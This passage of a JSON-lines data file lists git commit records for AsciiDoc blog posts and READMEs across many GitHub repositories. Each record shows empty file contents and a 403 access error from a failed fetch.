2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","new_file":"_posts\/2012-01-26-Presentation-de-Dart-par-Gilad-Bracha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a500ac2ca1c5ee51cea26fe033cea35f39c24e5","subject":"Deleted _posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Deleted _posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cc26c8bd4084d3b8b05b646afba5f43089193a","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9165ce0e113871b9c3b8512d8b4b1a1db208371d","subject":"Update 2015-06-06-Lorem-ipsum-3.adoc","message":"Update 2015-06-06-Lorem-ipsum-3.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a030fb535919ead941a2ea91ab95dcce409d1b11","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32eb5d728fceb3ed3b268db39f7e1e861fc961b3","subject":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","message":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc435613c63de609328245e954b0f59abb108e3b","subject":"Fixed link in docs","message":"Fixed link in docs\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c093f4f9a3cd75b2272589c31966e043c1354e","subject":"Update 2017-02-14-Testing.adoc","message":"Update 2017-02-14-Testing.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Testing.adoc","new_file":"_posts\/2017-02-14-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8624212f6192425979e1b7b9744bf5274f3fdeb3","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"575655934ca5c1073edb9fb96fe0a94aec22ab0e","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68ad7c818fb1b65427eab1c022b03b6359ce788d","subject":"example of structure analysis (see getting started doc page)","message":"example of structure analysis (see getting started doc page)\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/structure_analysis.out.asciidoc","new_file":"docs\/structure_analysis.out.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4b1137e068375e324c411a1b1227aca0eb5ce53f","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b0944ef7c5fcdded19996648cd55f2ee9bc231","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80cd451492fb47f7341b1784ae3f19031e5f9fac","subject":"initial Readme","message":"initial Readme\n","repos":"tuxdevelop\/spring-cloud-demo,tuxdevelop\/spring-cloud-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-cloud-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00f4770673d06d95cda1226a514ef5f9a138cfd7","subject":"Create README.adoc","message":"Create README.adoc","repos":"jbossas\/jboss-threads","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbossas\/jboss-threads.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ea8de459f14ecd0b775d8fb0ce988b1f214505c","subject":"Update 2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","message":"Update 2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","new_file":"_posts\/2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe4e9d8eed8be766f814e16d959ce1e7ee0526c","subject":"Update 2016-09-26-Military-Applications-of-Bionics.adoc","message":"Update 2016-09-26-Military-Applications-of-Bionics.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-Military-Applications-of-Bionics.adoc","new_file":"_posts\/2016-09-26-Military-Applications-of-Bionics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89f54eb4eb10eebf308258b02acb5d0060950ac3","subject":"minor","message":"minor\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44be87d4d10f3949fa744fbce9a958bdb466b1ca","subject":"Added README.","message":"Added README.\n\nSigned-off-by: Victory000 <2d7f9c62d729f8739ff5b330a8a961c96a7aeacf@gmail.com>\n","repos":"Victory000\/game,Victory000\/game,VictoriaLacroix\/game","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Victory000\/game.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9915fb9425b2ef24aae2219c0be5c13f34bd711f","subject":"Adding simple readme file with travis badge.","message":"Adding simple readme file with travis badge.\n","repos":"jpkrohling\/hawkular-commons,lucasponce\/hawkular-commons,hawkular\/hawkular-commons,hawkular\/hawkular-commons,lucasponce\/hawkular-commons,tsegismont\/hawkular-commons,ppalaga\/hawkular-commons,lucasponce\/hawkular-commons,hawkular\/hawkular-commons,hawkular\/hawkular-commons,jpkrohling\/hawkular-commons,lucasponce\/hawkular-commons","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsegismont\/hawkular-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aeed227b8952b7cd01f89ca52a96d70a24ccc515","subject":"Updated documentation","message":"Updated documentation\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7aea5d6878c37874c059ef81c245b3b241a8bafd","subject":"Updated documentation","message":"Updated documentation\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67820a951a61f59cef7442cf7c5d6c102100b70a","subject":"Initial drop","message":"Initial drop\n","repos":"learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code,learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code,trifonnt\/_book-learning-spring-boot-code,learning-spring-boot\/learning-spring-boot-code,trifonnt\/_book-learning-spring-boot-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/learning-spring-boot\/learning-spring-boot-code-1.2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bebaacd42364527ec4d9c566720bff3b11b94fe8","subject":"Add README which includes internal todo-list.","message":"Add README which includes internal todo-list.\n","repos":"IanDarwin\/TodoModel,IanDarwin\/TodoDataModel","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IanDarwin\/TodoDataModel.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d99cd50d2a9c967187cb84d4fc2b12bd2d95b193","subject":"y2b create post Otterbox Reflex Series iPad 2 Case Unboxing","message":"y2b create post Otterbox Reflex Series iPad 2 Case Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-16-Otterbox-Reflex-Series-iPad-2-Case-Unboxing.adoc","new_file":"_posts\/2011-12-16-Otterbox-Reflex-Series-iPad-2-Case-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02cff5378ae45025ed09b9c9283a1f4f7927d14f","subject":"writing document","message":"writing document\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/mml4.adoc","new_file":"doc\/mml4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e9428a82cd20e6fb7bab9f85dba88fae29d114e","subject":"Update 2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","message":"Update 2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","new_file":"_posts\/2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6635677d4e6a35931f438cfae894736d23cfd8","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58b436e6cdea429090cbbc9d2a69abf3fe9aae1a","subject":"How it works","message":"How it works\n","repos":"javatechs\/RxCmd,javatechs\/RxCmd,javatechs\/RxCmd","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javatechs\/RxCmd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64f8d3dd06d414d0544e018e0a774ced52f7a722","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f5a6a12e6b904d81bd2d5ca74442303ab6ac1c","subject":"Update 2015-08-14-First.adoc","message":"Update 2015-08-14-First.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-First.adoc","new_file":"_posts\/2015-08-14-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d65a57cb13353cae9fe774ac5a31adb8ad72c3c","subject":"Added blender doc on baking.","message":"Added blender doc on baking.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_action_baking.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_action_baking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"14eb3ede669231a0ec3d22a071cb4fc061148f7c","subject":"Create LICENSE.adoc","message":"Create LICENSE.adoc","repos":"microserviceux\/photon,microserviceux\/photon,microserviceux\/photon","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/photon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba8648a0278a24bcc75acf0fc6f59fa71d4751c3","subject":"Add manpage for pegasus-service-catalogs","message":"Add manpage for pegasus-service-catalogs\n","repos":"pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus","old_file":"doc\/pegasus-service-catalogs.asciidoc","new_file":"doc\/pegasus-service-catalogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pegasus-isi\/pegasus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12a2a4c79a58bdbd6266e23f91ad485de33795b7","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a14760dff09f8a95eadd9a300f5dd105f2310a4","subject":"Update 2018-03-10-Showing-or-Hiding-Password.adoc","message":"Update 2018-03-10-Showing-or-Hiding-Password.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-10-Showing-or-Hiding-Password.adoc","new_file":"_posts\/2018-03-10-Showing-or-Hiding-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be22ed0b1cad0fe7436c620076e0ee7f9d8b8c47","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_abundance_and_moderation.adoc","new_file":"content\/writings\/on_abundance_and_moderation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6a468e2d69be34e611fa768cecf0ea27ce94606e","subject":"Add new guide on Clojure equality","message":"Add new guide on Clojure equality\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/equality.adoc","new_file":"content\/guides\/equality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5cfa100e100636b36562b392c3475281e3f84fb8","subject":"Update 2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","message":"Update 2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","new_file":"_posts\/2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbfce49abf500d43bc623fb86d8d50a8035785c6","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27e6eda648a19c382a1aa0c024672c5799e4f31a","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DONT-Buy-The-Google-Pixel-Buds.adoc","new_file":"_posts\/2018-02-07-DONT-Buy-The-Google-Pixel-Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65d02449807f09db7b8ca2a3ab0df5173b19bd93","subject":"Update 2014-05-31-Everything-in-code.adoc","message":"Update 2014-05-31-Everything-in-code.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-31-Everything-in-code.adoc","new_file":"_posts\/2014-05-31-Everything-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cfbcff3d84dd01482ea00d8eabc7d0a77fecee5","subject":"Update 2015-06-16-My-first-blog-post.adoc","message":"Update 2015-06-16-My-first-blog-post.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-06-16-My-first-blog-post.adoc","new_file":"_posts\/2015-06-16-My-first-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e445a96fd39b6ed9fb41f72a3efb32ba50b9e2a","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f95e1b65aae0e3cc11eb1d92eb8fcc57c6641bd5","subject":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","message":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed936604821506c97911b88346c227d9e54e5bc","subject":"Update 2018-05-24-Rust-tips-n-tricks.adoc","message":"Update 2018-05-24-Rust-tips-n-tricks.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-24-Rust-tips-n-tricks.adoc","new_file":"_posts\/2018-05-24-Rust-tips-n-tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ed61a96cb0746004b690d32a862d5654a88f3f4","subject":"y2b create post The Most RIDICULOUS MacBook Pro","message":"y2b create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-05-The%20Most%20RIDICULOUS%20MacBook%20Pro.adoc","new_file":"_posts\/2018-01-05-The%20Most%20RIDICULOUS%20MacBook%20Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 